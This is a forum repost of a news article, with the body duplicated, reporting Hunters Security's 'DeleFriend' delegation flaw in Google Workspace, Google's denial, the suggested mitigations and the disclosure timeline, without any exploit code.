Brother
Professional
- Messages
- 2,590
- Reaction score
- 539
- Points
- 113
Researchers have found a way to impersonate a real user and hijack the account.
Google has denied a report about a vulnerability in the design of Google Workspace, identified by Hunters Security specialists. The bug, according to Hunters Security, allows an attacker to steal email from Gmail, extract data from Google Drive, and perform other unauthorized actions in the Google Workspace API.
Researchers from Hunters called the vulnerability "DeleFriend". The bug allows an attacker to manipulate existing Google Cloud Platform (GCP) and Google Workspace delegations without the superadministrator status that is usually required to create new delegations. The flaw makes it possible to search for Google service accounts with global delegations and increase privileges.
The problem is that the domain delegation configuration is determined by the service account Resource identifier (OAuth ID), and not by the specific private keys associated with the service account identification object. In addition, the API level does not implement any restrictions on fuzzing JSON Web Token (JWT) combinations, which allows a cybercriminal to create multiple JSON web tokens with different OAuth scopes-or predefined access rules — to try to identify accounts that have domain — level delegation enabled.
However, Google said that there are no security issues in the company's products, and recommended that users use the minimum possible privileges to protect against such attacks. Researchers have published a Proof-of-Concept (PoC) exploit on GitHub that shows how an attacker can use DeleFriend to perform various malicious actions. This includes unauthorized access to data and services, data modification, user tampering, and meeting monitoring in Google Calendar.
Hunters Security offered several solutions to the problem, including limiting the number of JWT requests using the same key and revising the permissions associated with the Editor role. The company reported the issue to Google in August, but Google hasn't fixed the vulnerability yet.
Google has denied a report about a vulnerability in the design of Google Workspace, identified by Hunters Security specialists. The bug, according to Hunters Security, allows an attacker to steal email from Gmail, extract data from Google Drive, and perform other unauthorized actions in the Google Workspace API.
Researchers from Hunters called the vulnerability "DeleFriend". The bug allows an attacker to manipulate existing Google Cloud Platform (GCP) and Google Workspace delegations without the superadministrator status that is usually required to create new delegations. The flaw makes it possible to search for Google service accounts with global delegations and increase privileges.
The problem is that the domain delegation configuration is determined by the service account Resource identifier (OAuth ID), and not by the specific private keys associated with the service account identification object. In addition, the API level does not implement any restrictions on fuzzing JSON Web Token (JWT) combinations, which allows a cybercriminal to create multiple JSON web tokens with different OAuth scopes-or predefined access rules — to try to identify accounts that have domain — level delegation enabled.
However, Google said that there are no security issues in the company's products, and recommended that users use the minimum possible privileges to protect against such attacks. Researchers have published a Proof-of-Concept (PoC) exploit on GitHub that shows how an attacker can use DeleFriend to perform various malicious actions. This includes unauthorized access to data and services, data modification, user tampering, and meeting monitoring in Google Calendar.
Hunters Security offered several solutions to the problem, including limiting the number of JWT requests using the same key and revising the permissions associated with the Editor role. The company reported the issue to Google in August, but Google hasn't fixed the vulnerability yet.
